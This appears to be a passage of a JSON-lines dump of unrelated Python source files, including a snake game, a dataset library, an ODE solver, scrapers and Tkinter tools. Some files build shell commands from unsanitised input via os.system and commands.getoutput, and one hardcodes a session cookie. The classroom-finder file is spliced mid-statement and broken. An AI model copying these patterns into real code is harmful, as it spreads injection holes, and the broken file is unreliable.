SCREEN_WIDTH or rect.top < 0 or rect.bottom > SCREEN_HEIGHT\n\n def CollideSelf(self):\n '检测是否碰撞自身'\n return len(pygame.sprite.spritecollide(self.sprites()[0], self, False)) > 1\n\n\n##############################################################\n\n\n# 游戏状态:0 开始,1 游戏,2 失败\nstate_index = 0\nspeed = 5\nsnake = None\n\n# 事件循环(main loop)\nwhile True:\n clock.tick(speed) # 游戏帧率(也是小蛇的运行速度)\n\n # 处理游戏退出,从消息队列中循环取\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n if event.type == pygame.KEYDOWN:\n\n if 
event.key == pygame.K_SPACE:\n if state_index in [0, 2]:\n # 开始游戏,初始化小蛇\n state_index = 1\n speed = 5\n del snake # 清空原有小蛇\n snake = Snake()\n if state_index == 1 and event.key in KEY_DIRECTION:\n snake.SetDirection(KEY_DIRECTION[event.key])\n # if event.key == pygame.K_LEFT:\n # snake.SetDirection(DIRE_LEFT)\n # elif event.key == pygame.K_RIGHT:\n # snake.SetDirection(DIRE_RIGHT)\n # elif event.key == pygame.K_UP:\n # snake.SetDirection(DIRE_UP)\n # elif event.key == pygame.K_DOWN:\n # snake.SetDirection(DIRE_DOWN)\n\n if state_index == 0:\n screen.blit(start_img, (0, 0)) # 绘制背景\n elif state_index == 2:\n '游戏失败'\n # screen.blit(fail_img, (0, 0))\n else:\n # 正常游戏时\n screen.blit(back_img, (0, 0))\n snake.update()\n snake.draw(screen)\n snake.ChangeDirection()\n if snake.Collide():\n state_index = 2\n screen.blit(fail_img, (0, 0)) # 状态改变时运行一次即可\n\n # 更新屏幕\n pygame.display.update() # 更新屏幕\n","sub_path":"snake.3.py","file_name":"snake.3.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"615032984","text":"from typing import Sequence, Any, Union, Callable, List, Tuple, Iterator, Iterable\nimport warnings\nimport pickle\nimport copy\nfrom pathlib import Path\nfrom itertools import accumulate, chain, islice\nimport bisect\n\n\nclass RandomAccessConcat:\n def __init__(self, *datasets: List[Sequence[Any]]) -> None:\n self._datasets = datasets\n self._offsets = None\n self._length = None\n\n def _initialize_offsets(self) -> None:\n self._lengths = list(accumulate(len(d) for d in self._datasets))\n self._offsets = [0] + self._lengths[:-1]\n\n def __iter__(self) -> Iterator[Any]:\n for d in self._datasets:\n yield from d\n\n def __getitem__(self, index: int) -> Any:\n if self._offsets is None:\n self._initialize_offsets()\n if index < 0 or len(self) <= index:\n raise IndexError('RandomAccessConcat object index out of range')\n j = bisect.bisect_right(self._lengths, index)\n return self._datasets[j][index - self._offsets[j]]\n\n def __len__(self) -> int:\n if self._offsets is None:\n self._initialize_offsets()\n if self._length is None:\n self._length = self._lengths[-1]\n return self._length\n\n\nclass RandomAccessZip:\n def __init__(self, *datasets: List[Sequence[Any]]) -> None:\n self._datasets = datasets\n self._length = None\n\n def __iter__(self) -> Iterator[Tuple[Any]]:\n yield from zip(*self._datasets)\n\n def __getitem__(self, index: int) -> Tuple[Any]:\n if index < 0 or len(self) <= index:\n raise IndexError('RandomAccessZip object index out of range')\n return tuple(d[index] for d in self._datasets)\n\n def __len__(self) -> int:\n if self._length is None:\n self._length = min(len(d) for d in self._datasets)\n return self._length\n\n\nclass Dataset:\n def __init__(self,\n dataset: Sequence[Any]) -> None:\n self._dataset = dataset\n self._length = None\n\n def __iter__(self) -> Iterator[Any]:\n yield from self._dataset\n\n def __getitem__(self, index: Union[int, slice]) -> Any:\n if isinstance(index, slice):\n start, stop, step = index.indices(len(self))\n return [self.get_example(i) for i in range(start, stop, step)]\n return self.get_example(index)\n\n def __len__(self) -> int:\n if self._length is None:\n self._length = self.get_length()\n return self._length\n\n def __add__(self, other: 'Dataset') -> 'ConcatDataset':\n return ConcatDataset(self, other)\n\n def get_example(self, i: int) -> Any:\n return self._dataset[i]\n\n def get_length(self) -> int:\n return len(self._dataset)\n\n def map(self, map_func: Callable[[Any], Any]) -> 'MapDataset':\n return MapDataset(self, map_func)\n\n def all(self) -> List[Any]:\n return list(self)\n\n def take(self, n: int) -> List[Any]:\n return list(islice(self, n))\n\n def first(self) -> Any:\n return next(iter(self))\n\n def save(self, filename: str) -> 'CacheDataset':\n path = Path(filename)\n if path.exists():\n print(f'Loading data from {filename}...')\n with path.open('rb') as f:\n cache = pickle.load(f)\n else:\n if not path.parent.exists():\n path.parent.mkdir(parents=True)\n print(f'Saving data to {filename}...')\n cache = list(self)\n with path.open('wb') as f:\n pickle.dump(cache, f)\n return CacheDataset(self, cache)\n\n @staticmethod\n def load(filename: str) -> 'Dataset':\n warnings.warn(\n 'lineflow.Dataset.load is deprecated. 
Please refer to '\n 'lineflow.load.',\n DeprecationWarning,\n stacklevel=2)\n return lineflow_load(filename)\n\n\nclass ConcatDataset(Dataset):\n def __init__(self, *datasets: List[Dataset]) -> None:\n assert all(isinstance(d, Dataset) for d in datasets)\n\n super().__init__(RandomAccessConcat(*datasets))\n\n\nclass ZipDataset(Dataset):\n def __init__(self, *datasets: List[Dataset]) -> None:\n assert all(isinstance(d, Dataset) for d in datasets)\n\n super().__init__(RandomAccessZip(*datasets))\n\n\nclass MapDataset(Dataset):\n def __init__(self,\n dataset: Dataset,\n map_func: Callable[[Any], Any]) -> None:\n assert callable(map_func)\n\n if isinstance(dataset, MapDataset):\n funcs = copy.deepcopy(dataset._funcs)\n funcs.append(map_func)\n processed_funcs = copy.deepcopy(dataset._processed_funcs)\n else:\n funcs = [map_func]\n processed_funcs = []\n\n self._funcs = funcs\n self._processed_funcs = processed_funcs\n\n if isinstance(dataset, Dataset):\n dataset = dataset._dataset\n\n super().__init__(dataset)\n\n def __iter__(self) -> Iterator[Any]:\n for x in self._dataset:\n for f in self._funcs:\n x = f(x)\n yield x\n\n def get_example(self, i: int) -> Any:\n x = self._dataset[i]\n for f in self._funcs:\n x = f(x)\n return x\n\n\nclass CacheDataset(MapDataset):\n def __init__(self,\n dataset: Dataset,\n cache: List[Any]) -> None:\n if isinstance(dataset, MapDataset):\n funcs = copy.deepcopy(dataset._funcs)\n processed_funcs = funcs + copy.deepcopy(dataset._processed_funcs)\n else:\n processed_funcs = []\n\n self._funcs = []\n self._processed_funcs = processed_funcs\n self._cache = cache\n self._length = len(self._cache)\n\n super(MapDataset, self).__init__(cache)\n\n\ndef lineflow_concat(*datasets: List[Dataset]) -> ConcatDataset:\n return ConcatDataset(*datasets)\n\n\ndef lineflow_zip(*datasets: List[Dataset]) -> ZipDataset:\n return ZipDataset(*datasets)\n\n\ndef lineflow_filter(\n predicate: Callable[[Any], bool],\n dataset: Dataset,\n lazy: bool = False) -> Union[Iterator[Any], List[Any]]:\n iterator = filter(predicate, dataset)\n if lazy:\n return iterator\n else:\n return list(iterator)\n\n\ndef lineflow_flat_map(\n map_func: Callable[[Iterable[Any]], Any],\n dataset: Dataset,\n lazy: bool = False) -> Union[Iterator[Any], List[Any]]:\n iterator = chain.from_iterable(map(map_func, dataset))\n if lazy:\n return iterator\n else:\n return list(iterator)\n\n\ndef lineflow_load(filename: str) -> Dataset:\n print(f'Loading data from {filename}...')\n with open(filename, 'rb') as f:\n dataset = pickle.load(f)\n return Dataset(dataset)\n","sub_path":"lineflow/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"561551055","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFecha de creación: Fri Oct 23 22:30:39 2015\n\nCreado por: antalcides\n\"\"\"\n\"\"\"\nSolve\ny^(4) + (4/x)y^3 = 0\nwith the boundary conditions\ny'(0) = y(0) = 0\ny\"(1) = 0\ny'''(1) = 1\nand plot y versus x.\n\n\"\"\"\nfrom numpy import zeros,array\nfrom run_kut5 import *\nfrom newtonRaphson2 import *\nfrom printSoln import *\ndef initCond(u):# Initial values of [y,y’,y\",y\"’];\n# use ’u’ if unknown\n return array([0.0, 0.0, u[0], u[1]])\ndef r(u):\n# Boundary condition residuals-- see Eq. (8.7)\n r = zeros(len(u))\n X,Y = integrate(F,x,initCond(u),xStop,h)\n y = Y[len(Y) - 1]\n r[0] = y[2]\n r[1] = y[3] - 1.0\n return r\ndef F(x,y): # First-order differential equations\n F = zeros(4)\n F[0] = y[1]\n F[1] = y[2]\n F[2] = y[3]\n if x == 0.0: F[3] = -12.0*y[1]*y[0]**2\n else: F[3] = -4.0*(y[0]**3)/x\n return F\nx = 0.0 # Start of integration\nxStop = 1.0 # End of integration\nu = array([-1.0, 1.0]) # Initial guess for u\nh = 0.05 # Initial step size\nfreq = 1 # Printout frequency\nu = newtonRaphson2(r,u,1.0e-5)\nX,Y = integrate(F,x,initCond(u),xStop,h)\nprintSoln(X,Y,freq)\nfrom pylab import*\nplot(X,Y[:,0],'-or')\n#plot(X,Y[:,1],'ob')\n#legend(('Y0', 'Y1'))\ngrid(True)\n\n","sub_path":"py/ej1_ode_newtonRaphson2.py","file_name":"ej1_ode_newtonRaphson2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"441132793","text":"# MINI PROJECT 4 START : 22.4.2019\nfrom Tkinter import *\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport mysearchengine\nfrom ttk import Combobox\nimport ttk\n\nclass Classroom:\n def __init__(self,building_No,floor_No,room_No):\n\n self.building_No = building_No\n self.floor_No = floor_No\n self.room_No = room_No\n self.traffic_Score = {}\n\n\n def get_distance_from(self,another_class_obj):\n\n bS = int(self.building_No)\n fS = int(self.floor_No)\n rS = int(self.room_No)\n\n totalCloseness = (abs(bS-int(another_class_obj.building_No))*100)+(abs(fS-int(another_class_obj.floor_No))*200)+(abs(rS-int(another_class_obj.room_No))*50)\n if totalCloseness == 0:\n totalCloseness = 100\n\n return totalCloseness\n\n\n\n\n\nclass Building:\n def __init__(self,b_name):\n self.b_name = b_name\n self.classrooms = []\n\nclass Day:\n def __init__(self,d_name):\n self.d_name = d_name\n self.timeSlots = {}\n\nclass SearchResultItem:\n def __init__(self,Classroom,closeness_score):\n self.Classroom = Classroom\n self.availability_score = 0.0\n self.closeness_score = closeness_score\n self.available_slots = [] # set of hours\n\n def compute_availability_score(self,wanted_timeInterval,wanted_Day,classDict,dayDict):\n\n start = int(wanted_timeInterval.split(\"-\")[0].split(\":\")[0])\n end = int(wanted_timeInterval.split(\"-\")[1].split(\":\")[0])\n wanted_hours = []\n\n for i in range(end-start):\n t = str(start+i)+\":\"+\"00\"\n wanted_hours.append(t)\n\n\n counter = 0\n slots = []\n for i in classDict:\n if classDict[i] == self.Classroom:\n wantedClass = i\n break\n for hour in wanted_hours:\n if wantedClass in dayDict[wanted_Day].timeSlots[hour]:\n counter += 1\n slots.append(hour)\n\n self.available_slots = slots\n\n wantedClassAvailablity = 100*(counter*60)/(len(wanted_hours)*60.0)\n\n self.availability_score = wantedClassAvailablity\n\n return wantedClassAvailablity\n\n\n\n\n\n\nclass Searcher:\n def __init__(self):\n self.Classes_Dict = {}\n self.Classroom_Distances = {}\n self.Days_Dict = {}\n self.Buildings_Dict = {}\n\n\n def fetch(self,link):\n\n urlsource = urllib2.urlopen(link)\n contents = urlsource.read()\n\n raw_data = BeautifulSoup(contents, features=\"html.parser\")\n\n allschedule = []\n\n self.BusyClasses = {}\n\n\n\n for i in raw_data.find_all(\"tr\"):\n if \"ACAD BUILD\" in str(i):\n lst = str(i).split('span style=\"font-size:8pt;\">')\n lstt = []\n for m in lst:\n if \"
\")[0]:\n lstt.append(m.split(\"\")[0].split(\",\"))\n allschedule.append(lstt)\n\n self.whatI_need = []\n for i in allschedule:\n classs = []\n days = i[-4][0].split(\" \\r\\n\")\n classs.append(days)\n\n hours = i[-3][0].split(\" \\r\\n\")\n classs.append(hours)\n\n room = i[-2][0].split(\"#\")[1].split(\" \\r\\n\")[0]\n classs.append([room])\n\n self.whatI_need.append(classs)\n\n\n for c in self.whatI_need:\n\n\n for eeachDay in c[0]:\n\n if len(c[0]) == 2 and len(c[1]) == 1:\n\n eachDay = eeachDay.strip()\n if eachDay != \"Saturday\":\n self.BusyClasses.setdefault(eachDay, {})\n self.BusyClasses[eachDay].setdefault(c[2][0], [])\n\n which_hours = []\n\n h = c[1][0].split(\"-\")\n h_1 = int(h[0].split(\":\")[0])\n h_2 = int(h[1].split(\":\")[0])\n total = (h_2 - h_1)\n for p in range(total):\n v = float(h_1 + p)\n which_hours.append(v)\n for v in which_hours:\n if v not in self.BusyClasses[eachDay][c[2][0]] and v < 19.0:\n self.BusyClasses[eachDay][c[2][0]].append(v)\n self.BusyClasses[eachDay][c[2][0]].sort()\n\n else:\n eachDay = eeachDay.strip()\n if eachDay != \"Saturday\":\n self.BusyClasses.setdefault(eachDay,{})\n self.BusyClasses[eachDay].setdefault(c[2][0],[])\n\n which_hours = []\n index = c[0].index(eeachDay)\n h = c[1][index].split(\"-\")\n h_1 = int(h[0].split(\":\")[0])\n h_2 = int(h[1].split(\":\")[0])\n total = (h_2-h_1)\n for p in range(total):\n v = float(h_1+p)\n which_hours.append(v)\n for v in which_hours:\n if v not in self.BusyClasses[eachDay][c[2][0]] and v<19.0:\n self.BusyClasses[eachDay][c[2][0]].append(v)\n self.BusyClasses[eachDay][c[2][0]].sort()\n\n for n in self.Classes_Dict:\n for ddd in self.BusyClasses:\n if n not in self.BusyClasses[ddd]:\n self.BusyClasses[ddd][n] = []\n\n for dday in c[0]:\n day = dday.strip()\n if day != \"Saturday\":\n day = Day(day)\n self.Days_Dict.setdefault(day.d_name,day)\n self.allTimeSlots = [09.0,10.0,11.0,12.0,13.0,14.0,15.0,16.0,17.0,18.0]\n for t in self.allTimeSlots:\n day.timeSlots[str(int(t))+\":00\"] = []\n\n\n for Number in c[2]:\n try:\n allNo = Number[:]\n bNo = Number[0]\n fNo = Number[1]\n rNo = Number[2:].split(\" \", self.roomComboboxClick)\n\n\n self.startLabel = Label(self.frame1,text=\"Start\")\n self.startCombobox = Combobox(self.frame1,width=6)\n self.startCombobox['values'] = [\"09:00\",\"10:00\",\"11:00\",\"12:00\",\"13:00\",\"14:00\",\"15:00\",\"16:00\",\"17:00\",\"18:00\"]\n self.startCombobox.current(0)\n\n self.endLabel = Label(self.frame1,text=\"End\")\n self.endCombobox = Combobox(self.frame1,width=6)\n self.endCombobox['values'] = [\"10:00\",\"11:00\",\"12:00\",\"13:00\",\"14:00\",\"15:00\",\"16:00\",\"17:00\",\"18:00\",\"19:00\"]\n self.endCombobox.current(9)\n\n self.dayLabel = Label(self.frame1,text=\"Day\",anchor = E)\n self.dayCombobox = Combobox(self.frame1)\n\n\n\n self.searchButton = Button(self.frame1,text=\"Search\",command= self.searchButtonC,width=8)\n\n self.treeview = ttk.Treeview(self.frame2)\n self.treeview['columns'] = ('Room', 'Traffic', 'Availablity %','Closeness','Overall Score')\n self.treeview.heading('Room', text='Room', anchor=CENTER)\n self.treeview.heading('Traffic', text='Traffic', anchor=CENTER)\n self.treeview.heading('Availablity %', text='Availablity %', anchor=CENTER)\n self.treeview.heading('Closeness', text='Closeness', anchor=CENTER)\n self.treeview.heading('Overall Score', text='Overall Score', anchor=CENTER)\n\n self.treeview.column('#00', anchor=W, minwidth=00, stretch=0, width=0)\n\n self.treeview.column('#01', anchor=W, minwidth=50, stretch=1, width=80)\n 
self.treeview.column('#02', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#03', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#04', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#05', anchor=W, minwidth=50, stretch=1, width=80)\n\n self.vsbar = Scrollbar(self.frame2, orient=VERTICAL)\n self.vsbar.config(command=self.treeview.yview)\n self.treeview.config(yscrollcommand=self.vsbar.set)\n\n\n\n # PACKING\n self.mainTitle.grid(row=0,column=0,sticky=EW)\n\n self.frame0.grid(row=1, column=0, sticky=E + W + N, pady= 10)\n self.frame1.grid(row=2, column=0, sticky=E + W + S,padx=5)\n self.frame2.grid(row=0, column=4, rowspan=4,pady=5,padx=5)\n\n self.urlLabel.grid(row=0, column=0)\n self.urlEntry.grid(row=0, column=1,sticky= E+W)\n\n self.colorLabel.grid(row=1,column=0, columnspan = 2, sticky=E,padx=(0,70),pady=5)\n self.fetchButton.grid(row=1,column=1,sticky=E,pady=5)\n\n self.filtersLabel.grid(row=2,column=0,padx=5)\n\n self.whereAmILabel.grid(row=0, column=0)\n self.whereAmILabelCombobox.grid(row=0, column=1)\n\n self.roomLabel.grid(row=1, column=0)\n self.roomCombobox.grid(row=1, column=1)\n\n self.startLabel.grid(row=2, column=0)\n self.startCombobox.grid(row=2, column=1,sticky=W)\n\n self.endLabel.grid(row=2, column=2,sticky=W,columnspan = 1)\n self.endCombobox.grid(row=2, column=3)\n\n self.dayLabel.grid(row=3, column=0)\n self.dayCombobox.grid(row=3, column=1)\n\n self.searchButton.grid(row=4, column=0,pady=(0,5))\n\n self.resultsTitle.grid(row=0,column=0,columnspan=2,sticky=E+W)\n self.treeview.grid(row=1, column=0,padx=(5,0),pady=5)\n self.vsbar.grid(row=1,column=1,sticky=S+N+W ,padx=(0,5),pady=5)\n\n def roomComboboxClick(self,event):\n try:\n building = self.whereAmILabelCombobox.get().split(\" \")[2]\n rooms = [room[1:] for room in self.SearcherObj.Classes_Dict if room[0] == building]\n rooms.sort()\n\n self.roomCombobox['values'] = rooms\n self.roomCombobox.current(0)\n\n except:\n pass\n\n def fetchButtonC(self):\n\n try:\n self.colorLabel.config(bg=\"yellow\")\n self.colorLabel.update()\n\n link = self.urlEntry.get()\n self.SearcherObj.fetch(link)\n buildings = [\"ACAD BUILD \"+i for i in self.SearcherObj.Buildings_Dict.keys()]\n buildings.sort()\n self.whereAmILabelCombobox['values'] = buildings\n self.whereAmILabelCombobox.current(0)\n self.roomComboboxClick(event=1)\n self.dayCombobox['values'] = self.SearcherObj.Days_Dict.keys()\n self.dayCombobox.current(0)\n\n self.colorLabel.config(bg=\"green\")\n except:\n pass\n\n def searchButtonC(self):\n\n try:\n whereAmI = (self.whereAmILabelCombobox.get()+self.roomCombobox.get()).split(\" \")[2]\n self.SearcherObj.compute_closeness_scores(whereAmI)\n\n self.SearcherObj.search(self.startCombobox.get()+\"-\"+self.endCombobox.get(),self.dayCombobox.get())\n\n self.SearcherObj.overall_score(self.dayCombobox.get())\n for i in self.treeview.get_children():\n self.treeview.delete(i)\n for r in self.SearcherObj.overall_scores:\n cls = r[1]\n\n self.treeview.insert('', 'end', values=[cls,\n round(self.SearcherObj.normalized_tScores[cls],4),\n round(self.SearcherObj.normalized_aScores[cls],4),\n round(self.SearcherObj.normalized_cScores[cls],4),\n r[0]])\n except:\n pass\n\ndef main():\n root = Tk()\n root.title(\"Empty Class for Sehirian\")\n root.geometry(\"766x500+490+50\")\n app = ECF_GUI(root)\n 
root.mainloop()\n\nmain()\n","sub_path":"EmptyClassroomFinderForSehirian.py","file_name":"EmptyClassroomFinderForSehirian.py","file_ext":"py","file_size_in_byte":17256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"418816703","text":"import os\nimport json\n\narr = os.listdir('./meme_data_2')\narr_result = []\nfor item in arr:\n print(item)\n if item != '.DS_Store':\n with open('./meme_data_2/'+ item, 'r') as image_file:\n arr_result.append({'image':'https://nielsezeka.github.io/data/meme_data_2/'+ item});\njson_string = json.dumps(arr_result)\nf = open(\"huge_pack_pexel.json\", \"a\")\nf.write(json_string)\nf.close()","sub_path":"data/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"211197148","text":"# -*- coding: utf-8 -*-\nfrom openerp.exceptions import Warning\nfrom openerp import models, fields, api\nfrom odoo import exceptions\n\nclass HrEmployeeUserAccessWizard(models.TransientModel):\n _name = 'employee.assign.user'\n\n notification = fields.Char('Notification')\n user_id = fields.Many2one('res.users','Users')\n\n @api.multi\n def action_assign_user(self):\n view_ref = self.env.ref('base.view_users_form')\n view_id = view_ref and view_ref.id or False,\n return {\n 'name': 'Assign Access For User',\n 'res_id': self.user_id.id,\n 'view_type': 'form',\n \"view_mode\": 'form',\n 'res_model': 'res.users',\n 'view_id':view_id,\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n\nHrEmployeeUserAccessWizard()","sub_path":"beta-dev1/biocare_field_modifier/wizard/assign_acesss_user.py","file_name":"assign_acesss_user.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"601029986","text":"for i in range(3):#0 1 2\n account = input(\"请输入账号\")\n pwd = int(input(\"请输入密码\"))\n if account != \"laowang\" or pwd != 123456:\n if i == 2:\n print(\"账号已经冻结\")\n else:\n print(\"重新输入\")\n else:\n num = int(input(\"请选择英雄 0-ADC 1-肉 2-法师\"))\n if num == 0:\n print(\"鲁班大师\")\n elif num == 1:\n print(\"陈咬金\")\n elif num == 2:\n print(\"王昭君\")\n else:\n print(\"I guest you are a single dog\")\n\n break#退出循环\n\n","sub_path":"10day/01-王者荣耀登录三次版本.py","file_name":"01-王者荣耀登录三次版本.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"386850724","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nimport os\r\n\r\nroot=Tk()\r\nmainframe = ttk.Frame(root, padding=\"10 10 12 12\")\r\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\nmainframe.columnconfigure(0, weight=1)\r\nmainframe.rowconfigure(0, weight=1)\r\n\r\n\r\nfilename=StringVar() # Value saved here\r\nTrain=StringVar() # Value saved here\r\nTest=StringVar() # Value saved here\r\nRegression=StringVar() # Value saved here\r\nHeader=StringVar() # Value saved here\r\ndataStart=StringVar() # Value saved here\r\nOutput=StringVar() # Value saved here\r\ndataEnd=StringVar()\r\nWD=StringVar()\r\n\r\ndef search():\r\n path = filename.get()\r\n End = int(dataEnd.get())\r\n Start = int(dataStart.get())\r\n Resultspath = Output.get()\r\n isRegress = Regression.get()\r\n isHeader = Header.get()\r\n trainset = Train.get()\r\n testset = Test.get()\r\n Cwd = WD.get()\r\n Cutoffphq = [10]\r\n Balancing = ['up', 'down']\r\n if Cwd != \"here\":\r\n os.chdir(Cwd)\r\n clfModels = ['kNN','LR', 'ADA', 'RF', 'SVC', 'XGB', 'NN' ]\r\n regModels = ['kNN', 'LR', 'ADA', 'RF']\r\n if isRegress == \"no\":\r\n for i in Balancing:\r\n Bal = i\r\n for a in Cutoffphq:\r\n cuttoff = a\r\n for j in clfModels:\r\n model = j\r\n args = 'python analyzer2.py --filename {} --dataStart {} --dataEnd {} --resampleType {} --doFeatureSelection \"True\" --modelType {} --targetData -1 --cutoff {} --printResultHeader {} --optimizeFor f1 --Regression {} --Train {} --Test {} >> {} '.format(\r\n path, Start, End, Bal, model, cuttoff,isHeader, isRegress, trainset, testset, Resultspath)\r\n os.system(args)\r\n print('1 Iteration done')\r\n\r\n elif isRegress == \"yes\":\r\n for j in regModels:\r\n model = j\r\n args = 'python analyzer2.py --filename {} --dataStart {} --dataEnd {} --doFeatureSelection False --regModel {} --targetData -1 --printResultHeader {} --optimizeFor f1 --Train {} --Test {} >> {} '.format(\r\n path, Start, End, model, isHeader, trainset, testset, Resultspath)\r\n os.system(args)\r\n print('1 Iteration done')\r\n\r\n print('Run Completed')\r\n root.destroy()\r\n\r\n return ''\r\n\r\nttk.Entry(mainframe, width=30, textvariable=filename).grid(column=2, row=1)\r\nttk.Entry(mainframe, width=30, textvariable=Test).grid(column=2, row=2)\r\nttk.Entry(mainframe, width=30, textvariable=Train).grid(column=2, row=3)\r\nttk.Entry(mainframe, width=30, textvariable=dataStart).grid(column=2, row=4)\r\nttk.Entry(mainframe, width=30, textvariable=dataEnd).grid(column=2, row=5)\r\nttk.Entry(mainframe, width=30, textvariable=Header).grid(column=2, row=6)\r\nttk.Entry(mainframe, width=30, textvariable=Regression).grid(column=2, row=7)\r\nttk.Entry(mainframe, width=30, textvariable=Output).grid(column=2, row=8)\r\nttk.Entry(mainframe, width=30, textvariable=WD).grid(column=2, row=9)\r\n\r\nttk.Label(mainframe, text=\"filepath\").grid(column=1, row=1)\r\nttk.Label(mainframe, text=\"Testing Set(.csv)\").grid(column=1, row=2)\r\nttk.Label(mainframe, text=\"Training Set(.csv)\").grid(column=1, row=3)\r\nttk.Label(mainframe, text=\"dataStart (col of csv file)\").grid(column=1, row=4)\r\nttk.Label(mainframe, text=\"dataEnd (col of csv file)\").grid(column=1, row=5)\r\nttk.Label(mainframe, text=\"Print Header Tag for values in output file(True/False)\").grid(column=1, row=6)\r\nttk.Label(mainframe, text=\"Regression (yes/no)\").grid(column=1, row=7)\r\nttk.Label(mainframe, text=\"Output destination(.csv)\").grid(column=1, row=8)\r\nttk.Label(mainframe, text=\"Working Directory(input here for 
current dir)\").grid(column=1, row=9)\r\n\r\n\r\nttk.Button(mainframe, text=\"Run\", command=search).grid(column=2, row=13)\r\n\r\nroot.mainloop()","sub_path":"MachineLearning.py","file_name":"MachineLearning.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"25738494","text":"import redis\nimport time\nimport proxy\n\nr = redis.Redis(host='redis', port=6379)\n\ndef set_a_proxy(proxy):\n r.set('proxy', proxy, ex=60)\n\ndef get_a_proxy():\n try:\n proxy = r['proxy']\n return proxy, 'ok'\n except:\n return 'get proxy failed', 'failed'\n\ndef get_redis_proxy():\n proxy_url, status = get_a_proxy()\n if(status == 'ok'):\n return proxy_url\n else:\n a_proxy = proxy.get_a_proxy()\n set_a_proxy(a_proxy)\n print('set proxy succeed {}'.format(a_proxy))\n return a_proxy\n\nif __name__ == '__main__':\n print(get_redis_proxy())","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"495084445","text":"# title time ans_num foc_num site\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport time as tm\nimport re\n\nurls = ['https://www.zhihu.com/people/yan-xi-5-31/following/questions?page={}'.format(str(i)) for i in range(1, 22)]\nheaders = {\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'aliyungf_tc=AQAAALlHnAa9hwYAgxkFajTTLlmNTUws; d_c0=\"AEBthFTRMA2PTl_q8JcaDUEOWBCASvcN_Fo=|1519394399\"; _xsrf=59a447e1-9a1f-4b04-b72a-46d1593e8b9c; q_c1=f20a23e1db6641b2af6c9ee3d1f65a8f|1519394399000|1519394399000; _zap=770526c5-761f-49c1-8d14-d04a42640566',\n 'Host': 'www.zhihu.com',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'\n}\n\n\ndef get_info(url):\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, 'lxml')\n titles = soup.select('div.QuestionItem-title > a')\n times = soup.find_all(text=re.compile(r'\\d{4}-\\d{2}-\\d{2}'))\n ans_nums = soup.find_all(text=re.compile(\"个回答\"))\n foc_nums = soup.find_all(text=re.compile(\"个关注\"))\n sites = soup.select('div.QuestionItem-title > a')\n\n for title, time, ans_num, foc_num, site in zip(titles, times, ans_nums, foc_nums, sites):\n def f(all):\n sum = 0\n for i, a in enumerate(all):\n sum = sum + pow(1000, len(all) - i - 1) * int(a)\n return sum\n\n data = {\n 'title': title.get_text(),\n 'time': time,\n 'ans_num': f(re.findall(r'\\d+', ans_num)),\n 'foc_num': f(re.findall(r'\\d+', foc_num)),\n 'site': 'https://www.zhihu.com' + site.get('href')\n }\n print(data)\n tm.sleep(4)\n\nget_info('https://www.zhihu.com/people/yan-xi-5-31/following/questions?page=1')\n","sub_path":"code/zhihu.py","file_name":"zhihu.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"180610344","text":"#-*- coding:utf-8 -*-\n__author__ = 'sisobus'\nimport commands\nimport os\nimport json\n\nALLOWED_EXTENSIONS = set(['txt','pdf','png','jpg','JPG','jpeg','JPEG','gif','GIF','zip'])\n\ndef allowedFile(filename):\n return '.' in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS\n\ndef createDirectory(directoryName):\n if not os.path.exists(directoryName):\n command = 'mkdir %s'%directoryName\n ret = commands.getoutput(command)\n command = 'chmod 777 %s'%directoryName\n ret = commands.getoutput(command)\n\ndef get_image_path(real_image_path):\n ret = ''\n for t in real_image_path.lstrip().rstrip().split('/')[6:]: ret=ret+t+'/'\n return ret[:-1]\n\ndef get_shop_category_dictionary():\n d = 